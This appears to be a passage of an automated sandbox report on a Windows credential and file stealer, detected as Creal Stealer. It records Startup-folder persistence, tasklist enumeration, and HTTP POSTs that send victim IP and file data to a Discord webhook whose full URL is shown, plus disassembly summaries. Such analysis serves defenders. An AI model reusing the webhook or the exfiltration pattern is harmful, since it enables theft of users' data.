2024-09-27 16:19:26 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 74 72 74 66 6d 46 78 62 67 4d 57 41 4b 2e 71 4f 6d 44 2e 35 44 36 39 62 7a 61 4d 4c 70 57 4a 6c 59 6a 70 49 58 75 64 50 42 34 77 2d 31 37 32 37 34 35 33 39 36 36 32 34 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 62 38 39 61 36 35 34 32 34 34 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=trtfmFxbgMWAK.qOmD.5D69bzaMLpWJlYjpIXudPB4w-1727453966246-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0b89a654244-EWR
2024-09-27 16:19:26 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.8	49793	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:26 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 506 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:26 UTC	506	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal \| File Stealer"}, "footer": {"text": "Creal Stealer \| ht
2024-09-27 16:19:26 UTC	1339	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:26 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=44217a347cec11efb64d42324cf1d653; Expires=Wed, 26-Sep-2029 16:19:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453968 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RhAmd%2BZgeZSXvXSe2c8EFXJmvH9xMs8ffRMvTWD%2BgpEDiVj1TMorvgpWqgrbsk7u1kL5Cf3ARtIvN%2FZ8Lnq2QFouNZ%2Bcmg7JmG5uG9tVZ%2BgnuBGdTLb6EXHf7MM0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=44217a347cec11efb64d42324cf1d6536764891083d930e3854fe40f90838770b3b087220fb7038ae92c001653b71c5a; Expires=Wed, 26-Sep-2029 16:19:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=6fc67678e78038628973969bbb16166b1bae5b34-1727453966; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:26 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 5a 37 4a 4b 7a 43 66 63 30 5f 32 54 58 75 4c 49 43 36 74 33 71 76 6d 6e 2e 50 48 48 66 52 54 70 47 4f 69 33 56 4d 4a 55 79 2e 55 2d 31 37 32 37 34 35 33 39 36 36 39 31 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 62 63 63 66 30 31 37 32 63 32 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=Z7JKzCfc0_2TXuLIC6t3qvmn.PHHfRTpGOi3VMJUy.U-1727453966910-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0bccf0172c2-EWR
2024-09-27 16:19:26 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.8	49794	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:27 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 506 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:27 UTC	506	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal \| File Stealer"}, "footer": {"text": "Creal Stealer \| ht
2024-09-27 16:19:27 UTC	1359	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:27 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=4487f5667cec11ef93fb42324cf1d653; Expires=Wed, 26-Sep-2029 16:19:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453968 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LvdxsnH3VeoqPUjoomoUuU5c8X4zgMRKqnXawrANMhKwi6hhMdo5016rsX9NCYa6wykIQqKlxIU8ADnLaK42CVTwRiVl9J9124eWt428wUlCxaHoTqN9SAmm7D34"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=4487f5667cec11ef93fb42324cf1d653bd54605707d20d5da4787f34f71b3a8d76e986fb5ce1476f20fea179a32ef6d4; Expires=Wed, 26-Sep-2029 16:19:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=dff45fc3a172b052c868c8c498e3328f5153195d-1727453967; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:27 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 68 41 74 41 2e 44 4c 42 53 75 42 41 4a 67 37 44 76 61 34 58 43 64 47 35 2e 6a 58 6a 36 34 6d 41 48 70 57 51 5a 36 67 6c 59 6d 6b 2d 31 37 32 37 34 35 33 39 36 37 35 37 38 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 63 30 66 39 62 63 30 66 38 64 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=hAtA.DLBSuBAJg7Dva4XCdG5.jXj64mAHpWQZ6glYmk-1727453967578-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0c0f9bc0f8d-EWR
2024-09-27 16:19:27 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Target ID:	0
Start time:	12:18:37
Start date:	27/09/2024
Path:	C:\Users\user\Desktop\HyZh4pn0RF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\HyZh4pn0RF.exe"
Imagebase:	0x7ff78f480000
File size:	13'884'221 bytes
MD5 hash:	A4FD5040DB03F0C04306AB7824320269
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:18:39
Start date:	27/09/2024
Path:	C:\Users\user\Desktop\HyZh4pn0RF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\HyZh4pn0RF.exe"
Imagebase:	0x7ff78f480000
File size:	13'884'221 bytes
MD5 hash:	A4FD5040DB03F0C04306AB7824320269
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1783767443.000002539B464000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1783368757.000002539B404000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:18:41
Start date:	27/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist"
Imagebase:	0x7ff736240000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:18:41
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:18:41
Start date:	27/09/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist
Imagebase:	0x7ff7d0ab0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:18:55
Start date:	27/09/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe"
Imagebase:	0x7ff769320000
File size:	13'884'221 bytes
MD5 hash:	A4FD5040DB03F0C04306AB7824320269
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:18:57
Start date:	27/09/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe"
Imagebase:	0x7ff769320000
File size:	13'884'221 bytes
MD5 hash:	A4FD5040DB03F0C04306AB7824320269
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000000A.00000002.2012652158.000001F3E3C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000000A.00000003.1959532011.000001F3E36D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000000A.00000003.1958967533.000001F3E36A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000000A.00000003.1958731140.000001F3E3403000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000000A.00000003.1959293524.000001F3E36B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000000A.00000003.1958528378.000001F3E363E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:18:59
Start date:	27/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist"
Imagebase:	0x7ff736240000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:18:59
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:18:59
Start date:	27/09/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist
Imagebase:	0x7ff7d0ab0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	78

Executed Functions

Function 00007FF78F4A6370 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF78F4A63B5

Part of subcall function 00007FF78F4A5D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A5D1C

Part of subcall function 00007FF78F49AF0C: RtlFreeHeap.NTDLL(?,?,?,00007FF78F4A3392,?,?,?,00007FF78F4A33CF,?,?,00000000,00007FF78F4A3895,?,?,00000000,00007FF78F4A37C7), ref: 00007FF78F49AF22
Part of subcall function 00007FF78F49AF0C: GetLastError.KERNEL32(?,?,?,00007FF78F4A3392,?,?,?,00007FF78F4A33CF,?,?,00000000,00007FF78F4A3895,?,?,00000000,00007FF78F4A37C7), ref: 00007FF78F49AF2C

Part of subcall function 00007FF78F49AEC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF78F49AEA3,?,?,?,?,?,00007FF78F4930CC), ref: 00007FF78F49AECD
Part of subcall function 00007FF78F49AEC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF78F49AEA3,?,?,?,?,?,00007FF78F4930CC), ref: 00007FF78F49AEF2

_get_daylight.LIBCMT ref: 00007FF78F4A63A4

Part of subcall function 00007FF78F4A5D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A5D7C

_get_daylight.LIBCMT ref: 00007FF78F4A661A
_get_daylight.LIBCMT ref: 00007FF78F4A662B
_get_daylight.LIBCMT ref: 00007FF78F4A663C
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF78F4A687C), ref: 00007FF78F4A6663

Strings

Eastern Standard Time, xrefs: 00007FF78F4A6709
Eastern Summer Time, xrefs: 00007FF78F4A6721

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 4070488512-239921721
Opcode ID: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
Instruction ID: a73aef75f4388d26dc4139e74757c0e68c4c951cdcd4ba4423bdbfe4c9a40efd
Opcode Fuzzy Hash: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
Instruction Fuzzy Hash: 8ED1B036E1929286E720BF26D8505F9A761FF84794FE08137EA0D47A95EF3CE441C760

Function 00007FF78F4A72BC Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF78F4A6FF0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A7031
Part of subcall function 00007FF78F4A6FF0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A70AF
Part of subcall function 00007FF78F4A6FF0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A7100

CreateFileW.KERNELBASE ref: 00007FF78F4A73C2
CreateFileW.KERNEL32 ref: 00007FF78F4A7412
GetLastError.KERNEL32 ref: 00007FF78F4A7442
GetFileType.KERNELBASE ref: 00007FF78F4A7457
GetLastError.KERNEL32 ref: 00007FF78F4A7461
CloseHandle.KERNEL32 ref: 00007FF78F4A7494
CloseHandle.KERNEL32 ref: 00007FF78F4A75F7
CreateFileW.KERNEL32 ref: 00007FF78F4A762C
GetLastError.KERNEL32 ref: 00007FF78F4A763B

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
Instruction ID: c0d9131b9762558f9808ba47a9fcd7019f2ad68f4de5e03aa10e30ffd471ebad
Opcode Fuzzy Hash: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
Instruction Fuzzy Hash: 68C1D233B25A8285EB20DF69C4806EC7761FB48BA8BA15236DE2E577E5CF38D455C310

Function 00007FF78F487950 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF78F48154F), ref: 00007FF78F4879E7

Part of subcall function 00007FF78F487B60: GetEnvironmentVariableW.KERNEL32(00007FF78F483A1F), ref: 00007FF78F487B9A
Part of subcall function 00007FF78F487B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF78F487BB7

Part of subcall function 00007FF78F497DEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F497E05

SetEnvironmentVariableW.KERNEL32 ref: 00007FF78F487AA1

Part of subcall function 00007FF78F482B30: MessageBoxW.USER32 ref: 00007FF78F482C05

Strings

_MEI%d, xrefs: 00007FF78F4879F5
TMP, xrefs: 00007FF78F4879B0
LOADER: Failed to set the TMP environment variable., xrefs: 00007FF78F4879CA
TMP, xrefs: 00007FF78F48798A, 00007FF78F487A49, 00007FF78F487AD7

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
API String ID: 3752271684-1116378104
Opcode ID: d0ee005bfdeb011a84540aff6346199bb1fc02b76f4ac94b865217064e0c6b04
Instruction ID: fef13944295f18d2f08830f08bfb372d368834703f256f56e2b648f59954a0c7
Opcode Fuzzy Hash: d0ee005bfdeb011a84540aff6346199bb1fc02b76f4ac94b865217064e0c6b04
Instruction Fuzzy Hash: 8F515131B2A2C341FA55B76698656FAD2917F89BC0FF44433ED0E477A6EE2CE401C220

Function 00007FF78F4A65EC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF78F4A661A

Part of subcall function 00007FF78F4A5D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A5D7C

_get_daylight.LIBCMT ref: 00007FF78F4A662B

Part of subcall function 00007FF78F4A5D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A5D1C

_get_daylight.LIBCMT ref: 00007FF78F4A663C

Part of subcall function 00007FF78F4A5D38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A5D4C

Part of subcall function 00007FF78F49AF0C: RtlFreeHeap.NTDLL(?,?,?,00007FF78F4A3392,?,?,?,00007FF78F4A33CF,?,?,00000000,00007FF78F4A3895,?,?,00000000,00007FF78F4A37C7), ref: 00007FF78F49AF22
Part of subcall function 00007FF78F49AF0C: GetLastError.KERNEL32(?,?,?,00007FF78F4A3392,?,?,?,00007FF78F4A33CF,?,?,00000000,00007FF78F4A3895,?,?,00000000,00007FF78F4A37C7), ref: 00007FF78F49AF2C

GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF78F4A687C), ref: 00007FF78F4A6663

Strings

Eastern Standard Time, xrefs: 00007FF78F4A6709
Eastern Summer Time, xrefs: 00007FF78F4A6721

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
